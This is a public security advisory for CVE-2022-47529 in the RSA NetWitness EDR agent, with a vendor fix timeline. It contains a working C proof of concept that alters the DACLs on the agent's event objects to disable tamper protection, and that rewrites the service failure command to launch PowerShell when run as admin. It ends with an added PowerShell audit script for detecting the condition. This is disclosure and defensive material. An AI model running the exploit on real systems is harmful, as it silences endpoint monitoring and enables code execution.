# Exploit Title: RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
RSA Security
www.netwitness.com

[Product]
NetWitness Endpoint EDR Agent

The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response.

[Vulnerability Type]
Incorrect Access Control / Code Execution

[CVE Reference]
CVE-2022-47529

[Security Issue]
CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending events to the SIEM, or to make the agent run user-supplied commands. Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local and admin Windows user accounts to modify the endpoint agent service configuration: either to disable it completely or to run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification.

Interestingly, the agent had already been uploaded to VirusTotal on 2022-01-05 17:24:32 UTC, months before this finding and report.

SHA-256: 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d LANDeskService.exe

[Severity]
Critical

[Impact(s)]
Denial-of-Service
Arbitrary Code Execution

[Attack Vector]
To exploit, open a handle to the memory objects held by the endpoint agent, modify the ACL on the ones that have insecure ACLs, and DENY access to the Everyone group.

[Affected Product Code Base]
All versions prior to v12.2

[Network Access]
Local

[References]
https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935

[Vuln Code Block]
.text:00000001400F7B10 sub_1400F7B10   proc near               ; CODE XREF: sub_14012F6F0+19B↓p
.text:00000001400F7B10                                         ; sub_14013BA50+19↓p
.text:00000001400F7B10                                         ; DATA XREF: ...
.text:00000001400F7B10                 push    rbx
.text:00000001400F7B12                 sub     rsp, 20h
.text:00000001400F7B16                 mov     rbx, rcx
.text:00000001400F7B19                 test    rcx, rcx
.text:00000001400F7B1C                 jz      short loc_1400F7B5C
.text:00000001400F7B1E                 call    cs:InitializeCriticalSection
.text:00000001400F7B24                 lea     rcx, [rbx+28h]  ; lpCriticalSection
.text:00000001400F7B28                 call    cs:InitializeCriticalSection
.text:00000001400F7B2E                 mov     edx, 1          ; bManualReset
.text:00000001400F7B33                 xor     r9d, r9d        ; lpName
.text:00000001400F7B36                 mov     r8d, edx        ; bInitialState
.text:00000001400F7B39                 xor     ecx, ecx        ; lpEventAttributes
.text:00000001400F7B3B                 call    cs:CreateEventW
.text:00000001400F7B41                 mov     [rbx+50h], rax
.text:00000001400F7B45                 mov     dword ptr [rbx+58h], 0
.text:00000001400F7B4C                 test    rax, rax
.text:00000001400F7B4F                 jz      short loc_1400F7B5C

[Exploit/POC]
"RSA_NetWitness_Exploit.c"

#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"

#define OPEN_ALL_ACCESS 0x1F0003

/*
RSA NetWitness EDR Endpoint Agent Tamper Protection Bypass / EoP Code Execution

RSA NetWitness.msi --> NWEAgent.exe
MD5: c0aa7e52cbf7799161bac9ebefa38d49

Expected result:
Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent.

Actual result:
RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user.

By John Page (hyp3rlinx) - Nov 2022

DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse.
Users of this supplied PoC code accept all risks, do no harm.

X64 PE file vuln code block: see [Vuln Code Block] above.

1) Install "RSA NetWitness.msi" (Endpoint EDR Agent)
2) Run the Exploit PoC as a Standard non-admin user; the PoC will:
   a) Open a handle (copy) to the Ecat002 event.
   b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to the Everyone group.
   c) Set/Reset the event via the Ecat002 handle.
   d) If running with admin privs, change the EDR service configuration.

Non-vulnerable agents will output "Not vulnerable" to the console; customers can modify and use this test to see if they are vulnerable.
*/

char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"};
BOOL PWNED = FALSE;

void Exploit();
int AdminChk();            /* prototype name corrected to match the definition below */
void HijackSvcConfig();

int main(void){
    printf("[+] RSA NetWitness EDR Agent 0Day\n");
    printf("[+] CVE-2022-47529\n");
    printf("[+] Discovery: John Page (aka hyp3rlinx)\n");
    printf("[+] ===================================\n");
    Exploit();
    if( AdminChk() ){
        printf("[+] Hijacked NetWitness Agent Service!\n");
        HijackSvcConfig();
    }
    Sleep(2000);
    printf("[+] Done!\n\n");
    system("pause");
    return 0;
}

void Exploit(){
    PACL pOldDACL = NULL;
    PACL pNewDACL = NULL;
    HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS, FALSE, (LPCSTR)"Global\\Ecat002");
    int i = 0;
    for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){
        HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS, FALSE, (LPCSTR)Vuln_Events[i]);
        /* OpenEventA returns NULL (not INVALID_HANDLE_VALUE) when the object cannot be opened */
        if(hEvent != NULL){
            printf("[-] Targeting Event: %s\n", Vuln_Events[i]);
            Sleep(500);
            /* Read the current DACL of the agent's named event object */
            if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){
                TRUSTEE trustee[1];
                trustee[0].TrusteeForm = TRUSTEE_IS_NAME;
                trustee[0].TrusteeType = TRUSTEE_IS_GROUP;
                trustee[0].ptstrName = TEXT("Everyone");
                trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
                trustee[0].pMultipleTrustee = NULL;

                /* Build a DENY-all ACE for Everyone and merge it into the existing DACL */
                EXPLICIT_ACCESS explicit_access_list[1];
                ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));
                explicit_access_list[0].grfAccessMode = DENY_ACCESS;
                explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;
                explicit_access_list[0].grfInheritance = NO_INHERITANCE;
                explicit_access_list[0].Trustee = trustee[0];

                if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){
                    printf("%s%d", "[!] Not vulnerable! ", GetLastError());
                }
                /* A patched agent rejects the WRITE_DAC attempt here */
                if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){
                    printf("%s%d", "[!] Not vulnerable! ", GetLastError());
                }else{
                    SetEvent(hEvent_Ecat002);
                    Sleep(1000);
                    ResetEvent(hEvent_Ecat002);
                    CloseHandle(hEvent_Ecat002);
                    SetEvent(hEvent);
                    Sleep(1000);
                    PWNED = TRUE;
                }
                if(PWNED){
                    LocalFree(pNewDACL);
                    LocalFree(pOldDACL);
                    CloseHandle(hEvent);
                }
                Sleep(1000);
            }
        }
    }
}

// If run as admin, modify the agent service config to run our own code.
int AdminChk(){
    int result = 0;
    HANDLE hToken = NULL;
    if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)){
        TOKEN_ELEVATION elevated;
        DWORD tokSize = sizeof(TOKEN_ELEVATION);
        if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){
            result = elevated.TokenIsElevated;
        }
    }
    if(hToken){
        CloseHandle(hToken);
    }
    return result;
}

// Trivial example: modify the service config...
void HijackSvcConfig(){
    Sleep(1000);
    WinExec("sc failure NWEAgent command= ""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0);
}

[POC Video URL]
https://www.youtube.com/watch?v=kO1fu4IOlSs

[Disclosure Timeline]
Vendor Notification: December 2, 2022
CVE assigned: December 19, 2022
Hotfix v12.1.0.1: January 3, 2023
Fixed in v12.2.0.0: January 4, 2023
Retested for vendor: January 6, 2023
March 24, 2023: Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c) hyp3rlinx
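The advisory describes two conditions a defender can check for on a host: named event objects of the agent whose DACL lets ordinary users rewrite permissions (the condition the PoC's SetSecurityInfo call depends on), and a service failure command on NWEAgent that an elevated user may have rewritten with "sc failure ... command=". The script below is an added audit example written for this page; it is not code from the advisory, from hyp3rlinx, or from NetWitness. It assumes Windows PowerShell 5.1 (.NET Framework, where EventWaitHandle.OpenExisting accepts an EventWaitHandleRights argument) on a host with the agent installed. The event names Global\Ecat002 and Global\Ecat004 and the service name NWEAgent are taken from the advisory; the choice of which rights count as "tamper" rights and which principals count as "broad" is the script's own assumption. The fix itself is the vendor's: the hotfix v12.1.0.1 or v12.2.0.0 named in the timeline.

```powershell
# Added audit script (not from the advisory or from NetWitness). Assumes Windows
# PowerShell 5.1 (.NET Framework) on a host with the Endpoint agent installed.
# Event and service names come from the advisory; the "tamper rights" and
# "broad principals" sets below are this script's own assumptions.
$AgentEvents  = 'Global\Ecat002', 'Global\Ecat004'
$AgentService = 'NWEAgent'

# Rights that let a caller rewrite the DACL or otherwise tamper with the object.
$TamperRights = [System.Threading.EventWaitHandleRights]::ChangePermissions -bor
                [System.Threading.EventWaitHandleRights]::TakeOwnership    -bor
                [System.Threading.EventWaitHandleRights]::Delete           -bor
                [System.Threading.EventWaitHandleRights]::Modify

# Principals every local user belongs to. An Allow ACE granting them tamper
# rights is what lets a standard user add the Deny ACE the advisory describes.
$BroadSids = @(
    [System.Security.Principal.WellKnownSidType]::WorldSid,              # Everyone
    [System.Security.Principal.WellKnownSidType]::AuthenticatedUserSid,  # Authenticated Users
    [System.Security.Principal.WellKnownSidType]::BuiltinUsersSid        # BUILTIN\Users
) | ForEach-Object { [System.Security.Principal.SecurityIdentifier]::new($_, $null).Value }

function Test-EventDacl {
    param([string]$Name)
    $result = [pscustomobject]@{ Event = $Name; Status = ''; Findings = @() }
    try {
        # READ_CONTROL only: enough to read the DACL, never to change it.
        $h = [System.Threading.EventWaitHandle]::OpenExisting(
                 $Name, [System.Threading.EventWaitHandleRights]::ReadPermissions)
    } catch [System.Threading.WaitHandleCannotBeOpenedException] {
        $result.Status = 'not present (agent not running?)'; return $result
    } catch [System.UnauthorizedAccessException] {
        $result.Status = 'DACL not readable by this user'; return $result
    }
    try {
        $rules = $h.GetAccessControl().GetAccessRules($true, $true,
                     [System.Security.Principal.SecurityIdentifier])
        foreach ($r in $rules) {
            if ($r.AccessControlType -ne 'Allow') { continue }
            if (($r.EventWaitHandleRights -band $TamperRights) -eq 0) { continue }
            if ($BroadSids -notcontains $r.IdentityReference.Value) { continue }
            $who = $r.IdentityReference.Value
            try { $who = $r.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value } catch {}
            $result.Findings += "$who : $($r.EventWaitHandleRights)"
        }
    } finally { $h.Close() }
    $result.Status = if ($result.Findings.Count) { 'broad principal holds tamper rights' }
                     else { 'DACL restricts tamper rights' }
    return $result
}

function Test-ServiceFailureCommand {
    param([string]$Service)
    # sc.exe qfailure prints the recovery settings, including the COMMAND_LINE
    # field that "sc failure <svc> command=" rewrites.
    $out  = & sc.exe qfailure $Service 2>&1 | ForEach-Object { "$_" }
    $line = $out | Where-Object { $_ -match '^\s*COMMAND_LINE\s*:' } | Select-Object -First 1
    if (-not $line) {
        return [pscustomobject]@{ Service = $Service; Status = 'could not query failure actions'; CommandLine = $null }
    }
    $cmd    = ($line -replace '^\s*COMMAND_LINE\s*:\s*', '').Trim()
    $status = if ($cmd) { 'REVIEW: a failure command is configured' } else { 'no failure command' }
    return [pscustomobject]@{ Service = $Service; Status = $status; CommandLine = $cmd }
}

$report  = @($AgentEvents | ForEach-Object { Test-EventDacl $_ })
$report += Test-ServiceFailureCommand $AgentService
$report | Format-List

# Non-zero exit so the check can run from a scheduled task or config-management job.
if ($report | Where-Object { $_.Findings -or $_.CommandLine }) { exit 1 }
```

Run it under a standard (non-elevated) user account to reproduce the vantage point the advisory describes: on a patched agent the events either cannot be opened for READ_CONTROL by that user or carry no Allow ACE granting tamper rights to Everyone, Authenticated Users or BUILTIN\Users. A configured COMMAND_LINE on NWEAgent is not proof of compromise, since administrators may legitimately set recovery commands, but it is the exact setting the advisory's PoC changes and so belongs in the review.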